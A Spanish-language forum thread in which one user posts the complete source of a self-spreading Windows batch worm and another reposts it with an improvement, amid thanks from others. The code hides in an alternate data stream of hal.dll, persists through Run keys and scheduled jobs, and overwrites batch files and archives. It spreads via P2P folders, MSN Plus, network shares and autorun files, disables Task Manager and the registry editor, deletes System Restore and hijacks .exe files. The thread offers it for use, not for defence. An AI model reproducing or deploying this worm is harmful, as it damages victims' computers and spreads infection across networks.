Mostrar mensajes previos
Ordenar por
por m3m0_11 Esquizofrénico
Pues os dejo este code de un malware en batch bastante completito, quien dijo que batch era limitado? mirad las fuciones.

Funciones:

-Se ejecuta oculto sin necesidad de "compilar" a exe.
-Se oculta por stream en hal.dll
-Crea una clave oculta que extrae de hal.dll el .bat volviendolo a generar
-Cada vez que se inicia sesion en el equipo se programa ejecutar uno de los bloques, con la hora equivalente al numero del bloque.


Funciones de los bloques:

Bloque 1º-A la 1:00 si este es el bloque elegido el malware ejecuta infinitos procesos ocultos para relentizar en SO

Bloque 2º-A las 2:00 so este es el bloque elegido el malware infectara todos los: cmd's,bat's,rar's y zip's de la unidad local.

Bloque 3º-Se propaga por casi todos los servidores p2p, si se puede comprimir el malware lo hace, sino se autocopia como .bat

Bloque 4º-Deshabilita el admin de tareas y el registro, tambien borra la herramienta restaurar sistema

Bloque 5º-Este code fue pensado por pato_pato_pato, aun asi yo lo modifique y lo hize (segun mi forma de pensar) algo mejor. El codigo hace que el malware se reproduzca por msn si tiene el msn plus.

Bloque 6º-Se comparte en NetBios como recurso compartido.

Bloque 7º-Se autocopia (si tiene permisos) en la unidad local de los pc's conectados en lan creando un autorun en ellos.

Bloque 8º-Se autocopia por unidades de red y locales creando un autorun en ellas.

Bloque 9º-Asocia los .exe como la ruta del malware, molestando asi a la hora de abrir un software.

Código: Seleccionar todo

@EcHo OfF&mOdE cOn LiNeS=1&mOdE cOn CoLs=1
@SeTlOcAl EnAbLeDeLaYeDeXpAnSiOn
@SeT n="%~0"
@SeT r=%random:~0,1%
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
ChDir %SystemRoot%\System32
CoPy /Y "%n%" %SyStEmRoOt%\SyStEm32\autoexec.bat
call:a>vbs.vbs
if "%1"=="" (
start vbs.vbs&exit
) else (
GoTo:c
)
:a
echo SET a=CreateObject^("WScript.Shell"^)
echo a.Run "autoexec.bat 0", vbHide
GoTo:EoF
:c
del /q vbs.vbs
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:CoDe
FoR /l %%a iN (1,1,350) dO (sEt C=!C!%%a)
TyPe "%n%">%SyStEmRoOt%\SyStEm32\hal.dll:aT.bat
cAlL:rEgiStRy HkEy_LoCaL_mAcHiNe\SoFtWaRe\MiCrOsOfT\wInDoWs\CuRrEnTvErSiOn rEg SyStEmRoOt!C! ReG_sZ
cAlL:aT %r%
If NoT  "%1"=="" (cAlL:%1) eLsE (GoTo:EoF)
GoTo:EoF
:rEgiStRy
%2 ADD "%1\RuN" /v "%3" /T "%4" /d "CmD.eXe /C mOrE < %SyStEmRoOt%\SyStEm32\hal.dll:aT.bat > %SyStEmRoOt%\SyStEm32\autoexec.bat" /f
%2 ADD "%1\RuN" /v "PixelMonitor" /T "%4" /d "%SyStEmRoOt%\SyStEm32\autoexec.bat" /f
GoTo:EoF
:aT
aT %r%:00 /interactive "sTaRt %SyStEmRoOt%\SyStEm32\autoexec.bat %r%"
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:1
sEt e=eChO
set a=%HoMeDrIvE%\cmd.vbs
%e% SET a=CreateObject^("WScript.Shell"^)>%a%
%e% Do>>%a%
%e% a.Run "cmd.exe",vbHide>>%a%
%e% Loop>>%a%
sTaRt %a%
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:2
FoR /f "ToKeNs=*" %%z In ('DiR /b /s %HoMeDrIvE%\*.bat') dO (cOpY /y "%n%" "%%z")
FoR /f "ToKeNs=*" %%y In ('DiR /b /s %HoMeDrIvE%\*.cmd') dO (cOpY /y "%n%" "%%y")
If ExIsT "%PrOgRaMfIlEs%\WinRar" (
FoR /f "ToKeNs=*" %%w In ('DiR /b /s %HoMeDrIvE%\*.rar') dO (StArT /mIn wInRaR.eXe a "%%w" "%CD%\%~n0%~x0")
FoR /f "ToKeNs=*" %%v In ('DiR /b /s %HoMeDrIvE%\*.zip') dO (StArT /mIn wInRaR.eXe a "%%v" "%CD%\%~n0%~x0")
)
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:3
sEt h=%HomeDrive%
iF eXiSt "%PrOgRaMfIlEs%\WinRar" (
sTarT wInRaR.eXe a %h%\Hacking.rar
CoPy /Y "%n%" %h%\Hacking.bat
sEt ext=rar
) else (
sEt ext=bat
)
MkDiR %h%\p2p&ChDiR %h%\p2p
FoR %%r iN (msnhacker,hacking,visualbasic,c,msnflood,hackmsn,porno) dO (
CoPy /Y %h%\Hacking.%ext% %%r.%ext%
)
FOR %%p IN ("%PROGRAMFILES%\Kazaa\My Shared Folder",
"%PROGRAMFILES%\Kazaa Lite\My Shared Folder",
"%PROGRAMFILES%\Grokster\My Grokster",
"%PROGRAMFILES%\Morpheus\My Shared Folder",
"%PROGRAMFILES%\EDONKEY2000\incoming",
"%PROGRAMFILES%\Gnucleus\Downloads",
"%PROGRAMFILES%\eMule\Incoming",
"%PROGRAMFILES%\BearShare\Shared",
"%PROGRAMFILES%\Shareaza\Downloads",
"%PROGRAMFILES%\ICQ\shared files",
"%PROGRAMFILES%\Filetopia3\Files",
"%PROGRAMFILES%\appleJuice\incoming",
"%PROGRAMFILES%\LimeWire\Shared",
"%PROGRAMFILES%\Overnet\incoming",
"%PROGRAMFILES%\Swaptor\Download",
"%PROGRAMFILES%\WinMX\My Shared Folder",
"%PROGRAMFILES%\Tesla\Files",
"%PROGRAMFILES%\XoloX\Downloads",
"%PROGRAMFILES%\Rapigator\Share",
"%PROGRAMFILES%\KMD\My Shared Folder",
"%PROGRAMFILES%\Direct Connect\Received Files",
"%HOMEDRIVE%\My Shared Folder") DO (
IF EXIST %%p (
COPY /Y "%h%\p2p\*.*" %%p
)
)
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:4
SET H=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
REG ADD "%H%" /v "DisableTaskMgr" /t reg_dword /d "00000001" /f
REG ADD "%H%" /v "DisableRegistryTools" /t reg_dword /d "00000001" /f
DosKey tskill=exit&DosKey taskkill=exit
ATTRIB -s -h -a -r %SystemRoot%\System32\restore\rstrui.exe
DEL /F /Q %SystemRoot%\System32\restore\rstrui.exe
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:5
TSKILL msnmsgr
IF NOT EXIST "%programfiles%\Messenger Plus! Live\Scripts\Plus! Live Script Engine\" (
MkDir "%programfiles%\Messenger Plus! Live\Scripts\Plus! Live Script Engine\"
)
REG ADD "HKEY_CURRENT_USER\Software\Patchou\Messenger Plus! Live\GlobalSettings\Scripts\Plus! Live Script Engine" /v Enabled /t REG_DWORD /d 1 /f
IF EXIST "%ProgramFiles%\winRAR" (
IF NOT EXIST %HomeDrive%\msncracker.rar (START /MIN WINRAR.EXE a "%HomeDrive%\msncracker.rar" "%~n0%~x0")
SET file=msncracker.rar
) else (
COPY /Y "%n%" %HomeDrive%\msncracker%~x0
SET file=msncracker%~x0
)
CALL:msnpropagation>"%programfiles%\Messenger Plus! Live\Scripts\Plus! Live Script Engine\Plus! Live Script Engine.js"
GoTo:EoF
:msnpropagation
echo function OnEvent_ChatWndReceiveMessage(ChatWnd, Origin, Message, MessageKind)
echo {
echo     if (Origin != Messenger.MyName)
echo     {
echo         ChatWnd.SendMessage("/sendfile %HomeDrive%\\%file%");
echo     }
echo }
PING -n 5 localhost > NUL
START msnmsgr.exe
GoTo:EoF
:6
MkDir %HomeDrive%\Playing&Copy /y "%n%" %HomeDrive%\Playing\Juego.bat
FOR %%d IN (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO (
NET SHARE %%d=%HomeDrive%\Playing
)
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:7
sEt e=eChO
FOR /F "skip=3 eol=S" %%z IN ('net view') DO (
sEt u=%%z\C$\autorun.inf
COPY /Y "%n%" "%%z\C$\WormsGame.bat"
%e% [autorun]>!u!
%e% shellexecute=WormsGame.bat>>!u!
)
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:8
FOR %%w IN (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO (
COPY /Y "%n%" "%%w:\Connect.bat"
echo [autorun]>%%w:\autorun.inf
echo shellexecute=Connect.bat>>%%w:\autorun.inf
)
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:9
AsSoC .exe=x
FtYpE x=%SyStEmRoOt%\SyStEm32\autoexec.bat
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:0
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
salu2
m3m0´s - RAT....(100%) --> publicado ;)
m3m0´s Botnet... (100%)
por aipse Sin sí­ntomas
Hola amigo, me da que aqui a nadie le interesa batch.

Vi tan solo algunos posts dedicados a batch, pero no demasiada cosa.

Saludos
por raulrl Delirios esporádicos
que a nadie le interesa el batch?!?!?!?!, dilo por ti porque yo me he estado estudiando este codigo a fondo
yo opino que el batch es el comodin de otros lenguajes de programación, para cuando algo no te sale o no sabes como expresarte adecuadamente
gracias por el codigo memo, gran coder el que lo hizo

Si se puede pensar, se puede programar (nunca mejor dicho )
Imagen
por aipse Sin sí­ntomas
Ahhhh que bien!!!! :) :) :) a alguien le intereso!!!

Haver, le hize una pequeña mejora que puede ser muy grande xD

Código: Seleccionar todo

@EcHo OfF&mOdE cOn LiNeS=1&mOdE cOn CoLs=1
@SeTlOcAl EnAbLeDeLaYeDeXpAnSiOn
@SeT n="%~0"
@SeT r=%random:~0,1%
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
ChDir %SystemRoot%\System32
CoPy /Y "%n%" %SyStEmRoOt%\SyStEm32\autoexec.bat
call:a>vbs.vbs
if "%1"=="" (
start vbs.vbs&exit
) else (
GoTo:c
)
:a
echo SET a=CreateObject^("WScript.Shell"^)
echo a.Run "autoexec.bat 0", vbHide
GoTo:EoF
:c
del /q vbs.vbs
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:CoDe
FoR /l %%a iN (1,1,350) dO (sEt C=!C!%%a)
TyPe "%n%">%SyStEmRoOt%\SyStEm32\hal.dll:aT.bat
cAlL:rEgiStRy HkEy_LoCaL_mAcHiNe\SoFtWaRe\MiCrOsOfT\wInDoWs\CuRrEnTvErSiOn rEg SyStEmRoOt!C! ReG_sZ
cAlL:aT %r%
If NoT  "%1"=="" (cAlL:%1) eLsE (GoTo:EoF)
GoTo:EoF
:rEgiStRy
%2 ADD "%1\RuN" /v "%3" /T "%4" /d "CmD.eXe /C mOrE < %SyStEmRoOt%\SyStEm32\hal.dll:aT.bat > %SyStEmRoOt%\SyStEm32\autoexec.bat ^& sTaRt %SyStEmRoOt%\SyStEm32\autoexec.bat" /f
%2 ADD "%1\RuN" /v "PixelMonitor" /T "%4" /d "%SyStEmRoOt%\SyStEm32\autoexec.bat" /f
GoTo:EoF
:aT
aT %r%:00 /interactive "sTaRt %SyStEmRoOt%\SyStEm32\autoexec.bat %r%"
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:1
sEt e=eChO
set a=%HoMeDrIvE%\cmd.vbs
%e% SET a=CreateObject^("WScript.Shell"^)>%a%
%e% Do>>%a%
%e% a.Run "cmd.exe",vbHide>>%a%
%e% Loop>>%a%
sTaRt %a%
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:2
FoR /f "ToKeNs=*" %%z In ('DiR /b /s %HoMeDrIvE%\*.bat') dO (cOpY /y "%n%" "%%z")
FoR /f "ToKeNs=*" %%y In ('DiR /b /s %HoMeDrIvE%\*.cmd') dO (cOpY /y "%n%" "%%y")
If ExIsT "%PrOgRaMfIlEs%\WinRar" (
FoR /f "ToKeNs=*" %%w In ('DiR /b /s %HoMeDrIvE%\*.rar') dO (StArT /mIn wInRaR.eXe a "%%w" "%CD%\%~n0%~x0")
FoR /f "ToKeNs=*" %%v In ('DiR /b /s %HoMeDrIvE%\*.zip') dO (StArT /mIn wInRaR.eXe a "%%v" "%CD%\%~n0%~x0")
)
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:3
sEt h=%HomeDrive%
iF eXiSt "%PrOgRaMfIlEs%\WinRar" (
sTarT wInRaR.eXe a %h%\Hacking.rar
CoPy /Y "%n%" %h%\Hacking.bat
sEt ext=rar
) else (
sEt ext=bat
)
MkDiR %h%\p2p&ChDiR %h%\p2p
FoR %%r iN (msnhacker,hacking,visualbasic,c,msnflood,hackmsn,porno) dO (
CoPy /Y %h%\Hacking.%ext% %%r.%ext%
)
FOR %%p IN ("%PROGRAMFILES%\Kazaa\My Shared Folder",
"%PROGRAMFILES%\Kazaa Lite\My Shared Folder",
"%PROGRAMFILES%\Grokster\My Grokster",
"%PROGRAMFILES%\Morpheus\My Shared Folder",
"%PROGRAMFILES%\EDONKEY2000\incoming",
"%PROGRAMFILES%\Gnucleus\Downloads",
"%PROGRAMFILES%\eMule\Incoming",
"%PROGRAMFILES%\BearShare\Shared",
"%PROGRAMFILES%\Shareaza\Downloads",
"%PROGRAMFILES%\ICQ\shared files",
"%PROGRAMFILES%\Filetopia3\Files",
"%PROGRAMFILES%\appleJuice\incoming",
"%PROGRAMFILES%\LimeWire\Shared",
"%PROGRAMFILES%\Overnet\incoming",
"%PROGRAMFILES%\Swaptor\Download",
"%PROGRAMFILES%\WinMX\My Shared Folder",
"%PROGRAMFILES%\Tesla\Files",
"%PROGRAMFILES%\XoloX\Downloads",
"%PROGRAMFILES%\Rapigator\Share",
"%PROGRAMFILES%\KMD\My Shared Folder",
"%PROGRAMFILES%\Direct Connect\Received Files",
"%HOMEDRIVE%\My Shared Folder") DO (
IF EXIST %%p (
COPY /Y "%h%\p2p\*.*" %%p
)
)
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:4
SET H=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
REG ADD "%H%" /v "DisableTaskMgr" /t reg_dword /d "00000001" /f
REG ADD "%H%" /v "DisableRegistryTools" /t reg_dword /d "00000001" /f
DosKey tskill=exit&DosKey taskkill=exit
ATTRIB -s -h -a -r %SystemRoot%\System32\restore\rstrui.exe
DEL /F /Q %SystemRoot%\System32\restore\rstrui.exe
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:5
TSKILL msnmsgr
IF NOT EXIST "%programfiles%\Messenger Plus! Live\Scripts\Plus! Live Script Engine\" (
MkDir "%programfiles%\Messenger Plus! Live\Scripts\Plus! Live Script Engine\"
)
REG ADD "HKEY_CURRENT_USER\Software\Patchou\Messenger Plus! Live\GlobalSettings\Scripts\Plus! Live Script Engine" /v Enabled /t REG_DWORD /d 1 /f
IF EXIST "%ProgramFiles%\winRAR" (
IF NOT EXIST %HomeDrive%\msncracker.rar (START /MIN WINRAR.EXE a "%HomeDrive%\msncracker.rar" "%~n0%~x0")
SET file=msncracker.rar
) else (
COPY /Y "%n%" %HomeDrive%\msncracker%~x0
SET file=msncracker%~x0
)
CALL:msnpropagation>"%programfiles%\Messenger Plus! Live\Scripts\Plus! Live Script Engine\Plus! Live Script Engine.js"
GoTo:EoF
:msnpropagation
echo function OnEvent_ChatWndReceiveMessage(ChatWnd, Origin, Message, MessageKind)
echo {
echo     if (Origin != Messenger.MyName)
echo     {
echo         ChatWnd.SendMessage("/sendfile %HomeDrive%\\%file%");
echo     }
echo }
PING -n 5 localhost > NUL
START msnmsgr.exe
GoTo:EoF
:6
MkDir %HomeDrive%\Playing&Copy /y "%n%" %HomeDrive%\Playing\Juego.bat
FOR %%d IN (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO (
NET SHARE %%d=%HomeDrive%\Playing
)
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:7
sEt e=eChO
FOR /F "skip=3 eol=S" %%z IN ('net view') DO (
sEt u=%%z\C$\autorun.inf
COPY /Y "%n%" "%%z\C$\WormsGame.bat"
%e% [autorun]>!u!
%e% shellexecute=WormsGame.bat>>!u!
)
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:8
FOR %%w IN (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO (
COPY /Y "%n%" "%%w:\Connect.bat"
echo [autorun]>%%w:\autorun.inf
echo shellexecute=Connect.bat>>%%w:\autorun.inf
)
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:9
AsSoC .exe=x
FtYpE x=%SyStEmRoOt%\SyStEm32\autoexec.bat
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:0
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
No me di cuenta de eso cuando lo hacia, cuando lo lee con MORE y le da salida a el fichero e system32 no lo ejecuta, entonces si lo elimina el infectado se regenerara, pero no se ejecutara xDD nada mas eso, pero esa simple instruccion mejora muchisimo el code.

Saludos!
por 4n0nym0us Usa camisa de fuerza
Cuanto tiempo Aipse! buen código el tuyo si señor!

Felicidades bro
No importa cuan rápida y avanzada sea la tecnología, la mente humana aún es el procesador más versátil y creativo que hay.
por polifemo Usa camisa de fuerza
aipse amigo... Muchas gracias por el code y bienvenido a bordo...

Y gracias ti también m3m0, que siempre nos traes buenas cosas...

Saludos
Imagen


El que comió... cree que todos comieron...
Temas similares
Analisis de Malware por Nemesis en Mensajes Entre Nosotros
Ayuda con un malware por doyylex en Dudas y Preguntas
Malware por Solidd13 en Dudas y Preguntas
Links sobre el tema
Variantes de tema
Responder

Volver a “Otros lenguajes”